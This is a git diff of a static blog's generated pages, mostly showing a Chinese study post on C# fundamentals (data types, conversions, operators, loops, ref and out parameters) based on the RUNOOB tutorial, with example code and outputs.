                    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/ML-\346\235\216\345\256\217\346\257\205-\346\251\237\345\231\250\345\246\202\344\275\225\347\224\237\346\210\220\345\234\226\345\203\217/index.html" "b/posts/ML-\346\235\216\345\256\217\346\257\205-\346\251\237\345\231\250\345\246\202\344\275\225\347\224\237\346\210\220\345\234\226\345\203\217/index.html" index 3b99955ff1..7cb9558f1f 100644 --- "a/posts/ML-\346\235\216\345\256\217\346\257\205-\346\251\237\345\231\250\345\246\202\344\275\225\347\224\237\346\210\220\345\234\226\345\203\217/index.html" +++ "b/posts/ML-\346\235\216\345\256\217\346\257\205-\346\251\237\345\231\250\345\246\202\344\275\225\347\224\237\346\210\220\345\234\226\345\203\217/index.html" @@ -44,8 +44,6 @@ - - @@ -4555,6 +4553,8 @@

                    目录

                    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/ML-\346\235\216\345\256\217\346\257\205-\346\251\237\345\231\250\345\246\202\344\275\225\347\224\237\346\210\220\346\226\207\345\217\245/index.html" "b/posts/ML-\346\235\216\345\256\217\346\257\205-\346\251\237\345\231\250\345\246\202\344\275\225\347\224\237\346\210\220\346\226\207\345\217\245/index.html" index f5927ca1b5..cfc0f43451 100644 --- "a/posts/ML-\346\235\216\345\256\217\346\257\205-\346\251\237\345\231\250\345\246\202\344\275\225\347\224\237\346\210\220\346\226\207\345\217\245/index.html" +++ "b/posts/ML-\346\235\216\345\256\217\346\257\205-\346\251\237\345\231\250\345\246\202\344\275\225\347\224\237\346\210\220\346\226\207\345\217\245/index.html" @@ -44,8 +44,6 @@ - - @@ -4570,6 +4568,8 @@

                    目录

                    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/ML-\346\235\216\345\256\217\346\257\205-\346\251\237\345\231\250\345\255\270\347\277\222\345\237\272\346\234\254\346\246\202\345\277\265\344\273\213\347\264\271/index.html" "b/posts/ML-\346\235\216\345\256\217\346\257\205-\346\251\237\345\231\250\345\255\270\347\277\222\345\237\272\346\234\254\346\246\202\345\277\265\344\273\213\347\264\271/index.html" index a5943c02c5..bc13d66143 100644 --- "a/posts/ML-\346\235\216\345\256\217\346\257\205-\346\251\237\345\231\250\345\255\270\347\277\222\345\237\272\346\234\254\346\246\202\345\277\265\344\273\213\347\264\271/index.html" +++ "b/posts/ML-\346\235\216\345\256\217\346\257\205-\346\251\237\345\231\250\345\255\270\347\277\222\345\237\272\346\234\254\346\246\202\345\277\265\344\273\213\347\264\271/index.html" @@ -44,8 +44,6 @@ - - @@ -4585,6 +4583,8 @@

                    目录

                    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/ML-\346\235\216\345\256\217\346\257\205-\346\255\243\347\242\272\350\252\215\350\255\230 ChatGPT/index.html" "b/posts/ML-\346\235\216\345\256\217\346\257\205-\346\255\243\347\242\272\350\252\215\350\255\230 ChatGPT/index.html" index a58c24dcfd..e11327532e 100644 --- "a/posts/ML-\346\235\216\345\256\217\346\257\205-\346\255\243\347\242\272\350\252\215\350\255\230 ChatGPT/index.html" +++ "b/posts/ML-\346\235\216\345\256\217\346\257\205-\346\255\243\347\242\272\350\252\215\350\255\230 ChatGPT/index.html" @@ -44,8 +44,6 @@ - - @@ -4575,6 +4573,8 @@

                    目录

                    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Math-Fouriter/index.html b/posts/Math-Fouriter/index.html index e851feaeae..517cf581af 100644 --- a/posts/Math-Fouriter/index.html +++ b/posts/Math-Fouriter/index.html @@ -44,8 +44,6 @@ - - @@ -698,6 +696,8 @@

                    目录

                    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/PL-RUNOOB-CSharp/index.html b/posts/PL-RUNOOB-CSharp/index.html index 1552543f39..3be9bbcf08 100644 --- a/posts/PL-RUNOOB-CSharp/index.html +++ b/posts/PL-RUNOOB-CSharp/index.html @@ -44,8 +44,6 @@ - - @@ -409,7 +407,7 @@

                    Hello world

In VS, create a Console App (.NET Framework) project.

                    webp

Let's start with Hello World!

using System;
namespace HelloWorldApplication
{
    /* the class is named HelloWorld */
    class HelloWorld
    {
        /* the Main method */
        static void Main(string[] args)
        {
            /* my first C# program */
            Console.WriteLine("Hello World!");
            Console.ReadKey();
        }
    }
}

C# environment

• C# Environment | RUNOOB Tutorial (runoob.com)
                    • @@ -436,15 +434,15 @@

using System;  // the using keyword brings the System namespace into the program.
namespace HelloWorldApplication // a namespace contains a set of classes; it helps organize code and prevents class-name clashes, and could be omitted here.
{
    class HelloWorld // C# is a fully object-oriented language: executable code must live inside a class.
    {
        static void Main(string[] args) // the Main method is the entry point of every C# program; it specifies what the class does when executed.
        {
            /* my first C# program */
            Console.WriteLine("Hello World");
            Console.ReadKey(); // for VS.NET users: makes the program wait for a key press so the console doesn't flash and close when launched from Visual Studio .NET. In VS2022 you can also start with Ctrl + F5 to keep the console from closing automatically.
        }
    }
}

C# basic syntax

C# is an object-oriented programming language. In object-oriented program design, a program consists of objects that interact with one another. Objects of the same kind usually share the same type, that is, they belong to the same class.

For example, take a Rectangle object. It has length and width attributes. Depending on the design, it may need to accept these attribute values, compute the area, and display the details.

using System;
namespace RectangleApplication
{
    class Rectangle
    {
        // member variables
        double length;
        double width;
        public void Acceptdetails()
        {
            length = 4.5;
            width = 3.5;
        }
        public double GetArea()
        {
            return length * width;
        }
        public void Display()
        {
            Console.WriteLine("Length: {0}", length);
            Console.WriteLine("Width: {0}", width);
            Console.WriteLine("Area: {0}", GetArea());
        }
    }

    class ExecuteRectangle
    {
        static void Main(string[] args)
        {
            Rectangle r = new Rectangle();
            r.Acceptdetails();
            r.Display();
            Console.ReadLine();
        }
    }
}

Length: 4.5
Width: 3.5
Area: 15.75

C# data types

• C# Data Types | RUNOOB Tutorial (runoob.com)
                      • @@ -456,23 +454,23 @@

Value types

using System;

namespace ConsoleApplication1
{
    class Program
    {
        static void Main(string[] args)
        {
            PrintValueTypeRange();
        }

        static void PrintValueTypeRange()
        {
            Console.WriteLine("Max of int: {0}", int.MaxValue);         // 32-bit signed integer
            Console.WriteLine("Max of uint: {0}", uint.MaxValue);       // 32-bit unsigned integer
            Console.WriteLine("Max of byte: {0}", byte.MaxValue);       // 8-bit unsigned integer
            Console.WriteLine("Max of sbyte: {0}", sbyte.MaxValue);     // 8-bit signed integer
            Console.WriteLine("Max of short: {0}", short.MaxValue);     // 16-bit signed integer
            Console.WriteLine("Max of ushort: {0}", ushort.MaxValue);   // 16-bit unsigned integer
            Console.WriteLine("Max of long: {0}", long.MaxValue);       // 64-bit signed integer
            Console.WriteLine("Max of ulong: {0}", ulong.MaxValue);     // 64-bit unsigned integer
            Console.WriteLine("Max of float: {0}", float.MaxValue);     // 32-bit single-precision floating point
            Console.WriteLine("Max of double: {0}", double.MaxValue);   // 64-bit double-precision floating point
            Console.WriteLine("Max of decimal: {0}", decimal.MaxValue); // 128-bit exact decimal, 28-29 significant digits
            Console.WriteLine("Min of int: {0}", int.MinValue);
            Console.WriteLine("Min of uint: {0}", uint.MinValue);
            Console.WriteLine("Min of byte: {0}", byte.MinValue);
            Console.WriteLine("Min of sbyte: {0}", sbyte.MinValue);
            Console.WriteLine("Min of short: {0}", short.MinValue);
            Console.WriteLine("Min of ushort: {0}", ushort.MinValue);
            Console.WriteLine("Min of long: {0}", long.MinValue);
            Console.WriteLine("Min of ulong: {0}", ulong.MinValue);
            Console.WriteLine("Min of float: {0}", float.MinValue);
            Console.WriteLine("Min of double: {0}", double.MinValue);
            Console.WriteLine("Min of decimal: {0}", decimal.MinValue);
            Console.ReadKey();
        }
    }
}

Max of int: 2147483647
Max of uint: 4294967295
Max of byte: 255
Max of sbyte: 127
Max of short: 32767
Max of ushort: 65535
Max of long: 9223372036854775807
Max of ulong: 18446744073709551615
Max of float: 3.402823E+38
Max of double: 1.79769313486232E+308
Max of decimal: 79228162514264337593543950335
Min of int: -2147483648
Min of uint: 0
Min of byte: 0
Min of sbyte: -128
Min of short: -32768
Min of ushort: 0
Min of long: -9223372036854775808
Min of ulong: 0
Min of float: -3.402823E+38
Min of double: -1.79769313486232E+308
Min of decimal: -79228162514264337593543950335

​ Decimal is not a floating-point data type. The Decimal structure holds a binary integer value together with a sign bit and an integer scaling factor that specifies the fractional part of the value. Because of this, a Decimal number has a more exact in-memory representation than the floating-point types (Single and Double). The decimal data type is meant for storing exact fractional values: compared with floating-point types such as float and double, decimal offers higher precision and avoids the rounding errors of floating-point arithmetic.
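
To make the rounding-error point concrete, here is a minimal sketch (my own illustrative example, not from the original page) comparing repeated addition in double and decimal:

using System;

class DecimalVsDouble
{
    static void Main()
    {
        double d = 0.0;
        decimal m = 0.0m;
        for (int i = 0; i < 10; i++)
        {
            d += 0.1;   // binary floating point: 0.1 has no exact representation
            m += 0.1m;  // decimal: 0.1 is stored exactly
        }
        Console.WriteLine(d == 1.0);   // False, accumulated rounding error
        Console.WriteLine(m == 1.0m);  // True
    }
}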

​ To get the exact size of a type or variable on a particular platform, use the sizeof operator. The expression sizeof(type) yields the storage size of the object or type in bytes.

using System;

namespace DataTypeApplication
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("Size of bool: {0}", sizeof(bool));
            Console.WriteLine("Size of byte: {0}", sizeof(byte));
            Console.WriteLine("Size of sbyte: {0}", sizeof(sbyte));
            Console.WriteLine("Size of int: {0}", sizeof(int));
            Console.WriteLine("Size of float: {0}", sizeof(float));
            Console.WriteLine("Size of double: {0}", sizeof(double));
            Console.WriteLine("Size of decimal: {0}", sizeof(decimal));
            Console.ReadLine();
        }
    }
}

                        Size of bool: 1
                        Size of byte: 1
                        Size of sbyte: 1
                        Size of int: 4
                        Size of float: 4
                        Size of double: 8
                        Size of decimal: 16

Object Type

The object type is the ultimate base class of all data types in the C# Common Type System (CTS). object is an alias for the System.Object class, so an object variable can be assigned a value of any other type (value type, reference type, predefined type, or user-defined type). However, assigning a value involves a type conversion first.

​ When a value type is converted to the object type, it is called boxing; conversely, when an object type is converted to a value type, it is called unboxing.

using System;

namespace Test
{
    class Program
    {
        static void Main(string[] args)
        {
            // Original value type
            int original = 10;

            // Boxing: wrap the int value in an object
            object boxed = original;

            // Unboxing: cast the object back to int
            int unboxed = (int)boxed;

            Console.WriteLine($"Original value: {original}");
            Console.WriteLine($"Unboxed value: {unboxed}");
        }
    }
}

Original value: 10
Unboxed value: 10

Dynamic Type

​ You can store a value of any type in a variable of the dynamic data type. Type checking for these variables takes place at run time.

​ Syntax for declaring a dynamic type:

dynamic d = 20;

​ The dynamic type is similar to the object type, but type checking for object-type variables takes place at compile time, whereas type checking for dynamic-type variables takes place at run time.
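
A minimal sketch of that difference (my own illustrative example): the object version will not compile without a cast, while the dynamic version compiles and binds at run time.

using System;

class DynamicVsObject
{
    static void Main()
    {
        object o = 10;
        // o = o + 5;     // compile-time error: '+' is not defined for object operands
        o = (int)o + 5;   // a cast back to int is required first

        dynamic d = 10;
        d = d + 5;        // compiles; the '+' binding is resolved at run time

        Console.WriteLine(o + " " + d); // 15 15
    }
}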

                        • C#中的 var 和 dynamic - 阿子 - 博客园 (cnblogs.com)

String Type

The string type lets you assign any string value to a variable. string is an alias for the System.String class, derived from the object type. A string value can be assigned in two forms: a quoted string literal or an @-quoted (verbatim) string literal.

​ For example:

string str = "runoob.com";

​ A C# string literal can be prefixed with @ (called a "verbatim string") to treat escape characters such as \ as ordinary characters (apparently similar to Python's raw-string prefix r), for example:

string str = @"C:\Windows";

​ which is equivalent to:

string str = "C:\\Windows";

​ An @-string may span multiple lines; the newlines and the indentation spaces all count toward the string's length.

using System;

namespace Test
{
    class Program
    {
        static void Main(string[] args)
        {
            string str = @"<script type=""text/javascript"">
<!--
-->
</script>";
            Console.WriteLine(str);
            Console.ReadLine();
        }
    }
}

                          <script type="text/javascript">
                          <!--
                          -->
                          </script>

​ The user-defined reference types are class, interface, and delegate. These are discussed in later chapters.

Pointer Types

​ A pointer-type variable stores the memory address of another type. Pointers in C# have the same capabilities as pointers in C or C++.

type* identifier;
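
A minimal usage sketch (my own example; note that unsafe code must be enabled at compile time, e.g. csc /unsafe or <AllowUnsafeBlocks>true</AllowUnsafeBlocks> in the project file):

using System;

class PointerDemo
{
    unsafe static void Main()
    {
        int value = 42;
        int* p = &value;             // p holds the address of the local variable
        Console.WriteLine(*p);       // dereference: prints 42
        Console.WriteLine((ulong)p); // the address itself, as a number
    }
}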

C# Type Conversion

                          • C# 类型转换 | 菜鸟教程 (runoob.com)

Implicit Type Conversion

​ Implicit conversions require no code to specify; the compiler performs them automatically.

​ An implicit conversion converts a smaller-range type to a larger-range type (e.g., from int to long, or from float to double). The compiler completes the conversion automatically; these are C#'s default safe conversions and cause no data loss.

byte b = 10;
int i = b; // implicit conversion, no cast needed

Explicit Conversion

​ An explicit type conversion, i.e., a cast, must be specified explicitly by the programmer in code.

​ An explicit conversion converts a larger-range type to a smaller-range type, or one object type to another; it requires a cast operator, and the forced conversion may lose data.

using System;

namespace Test
{
    class Program
    {
        static void Main(string[] args)
        {
            double a = 3.141592653589;
            float b = 3.141592653589f;

            Console.WriteLine(a + "");
            Console.WriteLine((float)a + "");
            Console.WriteLine(b);
            Console.ReadLine();
        }
    }
}

                            3.141592653589
                            3.141593
                            3.141593

C# Type Conversion Methods

​ Type conversion can also be done with the functions of the System.Convert class. They offer a safe way to perform conversions because they can handle null values, and they throw an exception when a conversion is not possible (a null-handling sketch follows the example below).


using System;

namespace Test
{
    class Program
    {
        static void Main(string[] args)
        {
            string a = "3.1415926535";
            float b = Convert.ToSingle(a);
            Single c = Convert.ToSingle(a);
            double d = Convert.ToDouble(a);

            Console.WriteLine(a);
            Console.WriteLine(b);
            Console.WriteLine(c);
            Console.WriteLine(d);
            Console.ReadLine();
        }
    }
}

                            3.1415926535
                            3.141593
                            3.141593
                            3.1415926535
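
The null-handling behavior mentioned above can be seen in a small sketch (my own illustrative example): Convert maps a null string to the target type's default value, whereas Parse throws.

using System;

class ConvertNullDemo
{
    static void Main()
    {
        string s = null;
        Console.WriteLine(Convert.ToInt32(s)); // prints 0: Convert treats null as the default value
        // int.Parse(s);                       // would throw ArgumentNullException
    }
}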

.ToString() converts a value of a particular type to a string; of course, concatenating with + "" works as well.

using System;

namespace TypeConversionApplication
{
    class StringConversion
    {
        static void Main(string[] args)
        {
            int i = 75;
            float f = 53.005f;
            double d = 2345.7652;
            bool b = true;
            Console.WriteLine(i.ToString());
            Console.WriteLine(f.ToString());
            Console.WriteLine(d.ToString());
            Console.WriteLine(b.ToString());
            Console.ReadKey();
        }
    }
}

Using the Parse Method

​ The Parse method converts a string to the corresponding numeric type, and throws an exception if the conversion fails.

string str = "123.45";
double d = double.Parse(str);
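
Since Parse throws on failure, here is a minimal sketch (my own illustrative example) of catching the resulting FormatException:

using System;

class ParseFailureDemo
{
    static void Main()
    {
        try
        {
            int n = int.Parse("123.45"); // "123.45" is not a valid integer
        }
        catch (FormatException e)
        {
            Console.WriteLine(e.Message);
        }
    }
}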

Using the TryParse Method

​ The TryParse method is similar to Parse, but instead of throwing an exception it returns a Boolean indicating whether the conversion succeeded.

using System;

namespace Test
{
    class Program
    {
        static void Main(string[] args)
        {
            string str = "123.45";
            double d;
            bool success = double.TryParse(str, out d);

            if (success)
            {
                Console.WriteLine("Conversion succeeded: " + d);
            }
            else
            {
                Console.WriteLine("Conversion failed");
            }

            int i;
            success = int.TryParse(str, out i);

            if (success)
            {
                Console.WriteLine("Conversion succeeded: " + i);
            }
            else
            {
                Console.WriteLine("Conversion failed");
            }

            Console.ReadKey();
        }
    }
}

Conversion succeeded: 123.45
Conversion failed

Custom Type Conversions

​ C# also lets you define custom type-conversion operators, using the implicit and explicit keywords in a type.

using System;

public class Fahrenheit
{
    public double Degrees { get; set; }

    public Fahrenheit(double degrees)
    {
        Degrees = degrees;
    }

    // Implicit conversion from Fahrenheit to Celsius
    public static implicit operator Celsius(Fahrenheit f)
    {
        return new Celsius((f.Degrees - 32) / 1.8);
    }

    // Explicit conversion from Celsius to Fahrenheit
    public static explicit operator Fahrenheit(Celsius c)
    {
        return new Fahrenheit(32 + c.Degrees * 1.8);
    }
}

public class Celsius
{
    public double Degrees { get; set; }

    public Celsius(double degrees)
    {
        Degrees = degrees;
    }
}

public class Program
{
    public static void Main()
    {
        Celsius c = new Celsius(37);
        Fahrenheit f = new Fahrenheit(98.6);
        Celsius c2 = f;                // implicit conversion
        Fahrenheit f2 = (Fahrenheit)c; // explicit conversion

        Console.WriteLine(c.Degrees + "°C");
        Console.WriteLine(f.Degrees + "°F");
        Console.WriteLine(c2.Degrees + "°C");
        Console.WriteLine(f2.Degrees + "°F");

        Console.ReadKey();
    }
}

implicit defines an implicit conversion.

explicit defines an explicit conversion.

The operator keyword is mainly used to overload operators; it can also define custom type conversions in a class or struct (see the sketch after the sample output below).

37°C
98.6°F
37°C
98.6°F
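
As a minimal sketch of the operator keyword's main use, operator overloading (my own illustrative Vector2 type, not from the original page):

using System;

struct Vector2
{
    public double X, Y;

    public Vector2(double x, double y)
    {
        X = x;
        Y = y;
    }

    // Overload '+' with the operator keyword: component-wise addition
    public static Vector2 operator +(Vector2 a, Vector2 b)
    {
        return new Vector2(a.X + b.X, a.Y + b.Y);
    }
}

class Program
{
    static void Main()
    {
        Vector2 v = new Vector2(1, 2) + new Vector2(3, 4);
        Console.WriteLine(v.X + ", " + v.Y); // 4, 6
    }
}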

C# Variables

​ A variable is nothing more than the name of a storage area that the program can manipulate.

Variable Definition in C#


Variable Initialization in C#

​ Initializing variables correctly is a good programming habit; otherwise a program can sometimes produce unexpected results.

using System;

namespace VariableDefinition
{
    class Program
    {
        static void Main(string[] args)
        {
            short a;
            int b;
            double c;

            /* actual initialization */
            a = 10;
            b = 20;
            c = a + b;
            Console.WriteLine("a = {0}, b = {1}, c = {2}", a, b, c);
            Console.ReadLine();
        }
    }
}

                            a = 10, b = 20, c = 30

Accepting Values from the User

The Console class in the System namespace provides the ReadLine() function, which receives input from the user and stores it in a variable (similar to scanf()).

using System;

namespace VariableDefinition
{
    class Program
    {
        static void Main(string[] args)
        {
            int num;
            num = Convert.ToInt32(Console.ReadLine());
            Console.WriteLine(num);
            Console.ReadLine();
        }
    }
}

Lvalues and Rvalues in C#

​ There are two kinds of expressions in C#:


                              int g = 20;

The following statement is invalid and produces a compile-time error:

10 = 20;

C# Variable Scope

​ In C#, a variable's scope defines its visibility and lifetime.

​ A variable's scope is usually determined by the code block delimited by braces {}, as the sketch below shows.
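
A minimal sketch of brace-delimited scope (my own illustrative example):

using System;

class ScopeDemo
{
    static void Main()
    {
        int outer = 1;
        {
            int inner = 2;            // visible only inside this inner block
            Console.WriteLine(outer + inner);
        }
        // Console.WriteLine(inner);  // compile-time error: inner is out of scope
    }
}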

Method Parameter Scope

​ C# is a fully object-oriented language, so a "global" variable can live no higher than a class definition:

class MyClass
{
    int memberVar = 30; // member variable, visible throughout the class
}

Static Variable Scope

static variables are declared at the class level, but their scope is likewise limited to the class that defines them.

class MyClass
{
    static int staticVar = 40; // static variable, visible throughout the class
}

Loop Variable Scope

​ A loop variable declared in a for loop is visible inside the loop body.

for (int i = 0; i < 5; i++)
{
    // i is visible inside the loop body
}
// i is not visible here

​ Overall, variable scope helps manage a variable's visibility and lifetime, ensures variables are used within their valid range, and helps prevent naming conflicts.

C# Constants


A suffix can be uppercase or lowercase, and multiple suffixes can be combined in any order.

using System;

namespace VariableDefinition
{
    class Program
    {
        static void Main(string[] args)
        {
            var num = 0xFeeL;
            Console.WriteLine(num);
            Console.ReadLine();
        }
    }
}

                              4078

Floating-Point Constants

​ A floating-point constant consists of an integer part, a decimal point, a fractional part, and an exponent part. A floating-point constant can be written in decimal form or in exponent form.

​ The original page claims that 314159E-5L is legal, but it fails when tested; only 314159E-5 is legal.
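
A short sketch of the literal suffixes involved (my own illustrative lines):

double a = 314159E-5; // exponent form, double by default: 3.14159
float b = 3.14159F;   // F/f suffix: float
double c = 3.14159D;  // D/d suffix: double
decimal m = 3.14159M; // M/m suffix: decimal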

Character Constants

using System;

namespace EscapeChar
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("Hello\tWorld\n\n");
            Console.ReadLine();
        }
    }
}

​ And so on; a few more character-literal forms are sketched below.
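
For reference (my own illustrative lines, not from the original page):

char plain = 'x';        // ordinary character
char tab = '\t';         // escape sequence
char quote = '\'';       // escaped single quote
char unicode = '\u0041'; // Unicode escape: 'A'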

String Constants

                              string a = "hello, world";  // hello, world
                              string b = @"hello, world"; // hello, world
                              string c = "hello \t world"; // hello world
                              string d = @"hello \t world"; // hello \t world
                              string e = "Joe said \"Hello\" to me"; // Joe said "Hello" to me
                              string f = @"Joe said ""Hello"" to me"; // Joe said "Hello" to me
                              string g = "\\\\server\\share\\file.txt"; // \\server\share\file.txt
                              string h = @"\\server\share\file.txt"; // \\server\share\file.txt
                              string i = "one\r\ntwo\r\nthree";
                              string j = @"one
                              two
                              three";

​ Carriage return and newline are two related but distinct concepts; they are usually used together to control how text is laid out and formatted when displayed or stored.
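
A minimal sketch (my own illustrative example): \r is the carriage return and \n the line feed; Windows conventionally uses "\r\n" while Unix-like systems use "\n", and Environment.NewLine yields the platform default.

using System;

class NewlineDemo
{
    static void Main()
    {
        Console.Write("one\r\ntwo\r\n");              // explicit CR+LF
        Console.Write("three" + Environment.NewLine); // platform default terminator
    }
}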


C# Operators

​ These are mostly the same as in C/C++, so I only note a few things I had not seen before.

is checks whether an object is of a given type.

using System;

namespace VariableDefinition
{
    class Program
    {
        static void Main(string[] args)
        {
            dynamic a = 3.14;
            Console.WriteLine(a is float); // 3.14 is a double literal, not a float
            Console.ReadLine();
        }
    }
}

                          False

as performs a cast that does not throw even when the conversion fails (it returns null instead).

using System;

namespace AsOperatorExample
{
    class Program
    {
        static void Main(string[] args)
        {
            object obj = "This is a string";

            // Using 'as' operator to cast obj to string
            string str = obj as string;

            if (str != null)
            {
                Console.WriteLine("The object was successfully cast to a string.");
                Console.WriteLine(str);
            }
            else
            {
                Console.WriteLine("The object could not be cast to a string.");
            }

            // Attempting to cast obj to an incompatible type
            obj = 123;
            str = obj as string;

            if (str == null)
            {
                Console.WriteLine("The object could not be cast to a string because it is not a compatible type.");
            }
        }
    }
}

                          The object was successfully cast to a string.
                          This is a string
                          The object could not be cast to a string because it is not a compatible type.
                          +
                          1
                          2
                          3
                          4
                          5
                          6
                          7
                          8
                          9
                          10
                          11
                          12
                          13
                          14
                          15
                          16
                          17
                          18
                          19
                          20
                          21
                          22
                          23
                          24
                          25
                          26
                          27
                          28
                          29
                          30
                          31
                          32
                          33
                          34
                          using System;

                          namespace AsOperatorExample
                          {
                          class Program
                          {
                          static void Main(string[] args)
                          {
                          object obj = "This is a string";

                          // Using 'as' operator to cast obj to string
                          string str = obj as string;

                          if (str != null)
                          {
                          Console.WriteLine("The object was successfully cast to a string.");
                          Console.WriteLine(str);
                          }
                          else
                          {
                          Console.WriteLine("The object could not be cast to a string.");
                          }

                          // Attempting to cast obj to an incompatible type
                          obj = 123;
                          str = obj as string;

                          if (str == null)
                          {
                          Console.WriteLine("The object could not be cast to a string because it is not a compatible type.");
                          }
                          }
                          }
                          }
                          +
                          1
                          2
                          3
                          The object was successfully cast to a string.
                          This is a string
                          The object could not be cast to a string because it is not a compatible type.
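
As a side note (my addition, not from the original tutorial): since C# 7.0 the is operator with a declaration pattern can combine the type test and the cast in one step. A minimal sketch, with illustrative names:

using System;

class IsPatternSketch
{
    static void Main()
    {
        object obj = "This is a string";

        // 'is' both tests the runtime type and binds the cast result to s
        if (obj is string s)
        {
            Console.WriteLine("Cast succeeded: " + s);
        }
        else
        {
            Console.WriteLine("obj is not a string.");
        }
    }
}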

typeof() returns the Type of a class.

using System;

class Program
{
    static void Main(string[] args)
    {
        Type type = typeof(string);
        Console.WriteLine(type.FullName);
        Console.ReadKey();
    }
}

Output:
System.String
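
A related point worth noting (my addition, not from the tutorial): typeof takes a compile-time type name, while GetType() asks an object for its runtime type. A small sketch:

using System;

class TypeSketch
{
    static void Main()
    {
        object o = "hello";                         // static type object, runtime type string
        Console.WriteLine(typeof(string).FullName); // System.String, resolved at compile time
        Console.WriteLine(o.GetType().FullName);    // System.String, resolved at run time
    }
}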

C# Decision Making

Defining an array in C#:

int[] fibarray = new int[] { 0, 1, 1, 2, 3, 5, 8, 13 };

Defining a list in C#:

using System.Collections.Generic; // List<T> lives in this namespace

// Create a list of strings
List<string> myStrings = new List<string>();

// Add some string elements to the list
myStrings.Add("Google");
myStrings.Add("Runoob");
myStrings.Add("Taobao");

Loop syntax is mostly the same as in C/C++. Let's try foreach, which I have never been very comfortable with:

class ForEachTest
{
    static void Main(string[] args)
    {
        int[] fibarray = new int[] { 0, 1, 1, 2, 3, 5, 8, 13 };
        foreach (int element in fibarray)
        {
            System.Console.WriteLine(element);
        }
        System.Console.WriteLine();

        // an equivalent for loop
        for (int i = 0; i < fibarray.Length; i++)
        {
            System.Console.WriteLine(fibarray[i]);
        }
        System.Console.WriteLine();

        // keep a counter for the elements in the collection
        int count = 0;
        foreach (int element in fibarray)
        {
            count += 1;
            System.Console.WriteLine("Element #{0}: {1}", count, element);
        }
        System.Console.WriteLine("Number of elements in the array: {0}", count);
    }
}

Output:
0
1
1
2
3
5
8
13

0
1
1
2
3
5
8
13

Element #1: 0
Element #2: 1
Element #3: 1
Element #4: 2
Element #5: 3
Element #6: 5
Element #7: 8
Element #8: 13
Number of elements in the array: 8

C# Encapsulation

                          • C# 封装 | 菜鸟教程 (runoob.com)

C# Methods

<Access Specifier> <Return Type> <Method Name>(Parameter List)
{
    Method Body
}
• Access Specifier: the access modifier; it determines the visibility of a variable or method to other classes.
• Return type: a method can return a value, and this is the data type of that value. If the method does not return anything, the return type is void (a concrete instance of the template follows this list).
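
As a concrete instance of the template above (class and method names here are illustrative, not from the tutorial):

using System;

class Calculator
{
    // Access specifier: public; return type: int; method name: Add
    public int Add(int a, int b)
    {
        return a + b;
    }

    static void Main()
    {
        Calculator c = new Calculator();
        Console.WriteLine(c.Add(2, 3)); // 5
    }
}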

Passing Parameters by Value

This is the default way parameters are passed. When a method is called, a new storage location is created for each value parameter.

The value of the actual argument is copied into the formal parameter, so the argument and the parameter occupy two different memory locations. Changing the parameter therefore does not affect the argument, which keeps the caller's data safe. The following example demonstrates this:

using System;
namespace CalculatorApplication
{
    class NumberManipulator
    {
        public void swap(int x, int y)
        {
            int temp;

            temp = x; /* save the value of x */
            x = y;    /* assign y to x */
            y = temp; /* assign temp to y */
        }

        static void Main(string[] args)
        {
            NumberManipulator n = new NumberManipulator();
            /* local variable definition */
            int a = 100;
            int b = 200;

            Console.WriteLine("Before the swap, value of a: {0}", a);
            Console.WriteLine("Before the swap, value of b: {0}", b);

            /* call the function to swap the values */
            n.swap(a, b);

            Console.WriteLine("After the swap, value of a: {0}", a);
            Console.WriteLine("After the swap, value of b: {0}", b);

            Console.ReadLine();
        }
    }
}

When the above code is compiled and executed, it produces the following result:

Before the swap, value of a: 100
Before the swap, value of b: 200
After the swap, value of a: 100
After the swap, value of b: 200

The swap of a and b failed: swap exchanged only its own local copies of the values.

Passing Parameters by Reference

A reference parameter is a reference to the memory location of a variable. Unlike value parameters, passing by reference does not create a new storage location; the reference parameter denotes the same memory location as the actual argument supplied to the method.

This is similar to pointers in C/C++.

In C#, reference parameters are declared with the ref keyword. The following example demonstrates this:

using System;
namespace CalculatorApplication
{
    class NumberManipulator
    {
        public void swap(ref int x, ref int y)
        {
            int temp;

            temp = x; /* save the value of x */
            x = y;    /* assign y to x */
            y = temp; /* assign temp to y */
        }

        static void Main(string[] args)
        {
            NumberManipulator n = new NumberManipulator();
            /* local variable definition */
            int a = 100;
            int b = 200;

            Console.WriteLine("Before the swap, value of a: {0}", a);
            Console.WriteLine("Before the swap, value of b: {0}", b);

            /* call the function to swap the values */
            n.swap(ref a, ref b);

            Console.WriteLine("After the swap, value of a: {0}", a);
            Console.WriteLine("After the swap, value of b: {0}", b);

            Console.ReadLine();
        }
    }
}

Output:
Before the swap, value of a: 100
Before the swap, value of b: 200
After the swap, value of a: 200
After the swap, value of b: 100

Passing Parameters by Output

A return statement can return only one value from a function. Output parameters let a function return multiple values: an output parameter has data assigned to it by the method, and otherwise behaves like a reference parameter (a sketch that actually returns two values follows the example below).

using System;

namespace CalculatorApplication
{
    class NumberManipulator
    {
        public void getValue(out int x)
        {
            int temp = 5;
            x = temp;
        }

        static void Main(string[] args)
        {
            NumberManipulator n = new NumberManipulator();
            /* local variable definition */
            int a = 100;

            Console.WriteLine("Before the method call, value of a: {0}", a);

            /* call the function to get the value */
            n.getValue(out a);

            Console.WriteLine("After the method call, value of a: {0}", a);
            Console.ReadLine();
        }
    }
}

Output:
Before the method call, value of a: 100
After the method call, value of a: 5
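
To actually return more than one value, a method can declare several out parameters. A minimal sketch (method and variable names are illustrative, not from the tutorial):

using System;

class OutSketch
{
    // Both the quotient and the remainder come back through out parameters
    static void DivMod(int a, int b, out int quotient, out int remainder)
    {
        quotient = a / b;
        remainder = a % b;
    }

    static void Main()
    {
        int q, r;
        DivMod(17, 5, out q, out r);
        Console.WriteLine("17 / 5 = {0} remainder {1}", q, r); // 17 / 5 = 3 remainder 2
    }
}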

C# Nullable Types

The single question mark marks a type as nullable: it allows value types such as int, double, and bool, which normally cannot hold null, to be assigned null.

using System;
namespace CalculatorApplication
{
    class NullablesAtShow
    {
        static void Main(string[] args)
        {
            int? num1 = null;
            int? num2 = 45;
            double? num3 = new double?();
            double? num4 = 3.14157;

            bool? boolval = new bool?();

            // display the values
            Console.WriteLine("Values of the nullable types: {0}, {1}, {2}, {3}",
                              num1, num2, num3, num4);
            Console.WriteLine("A nullable boolean value: {0}", boolval);
            Console.ReadLine();
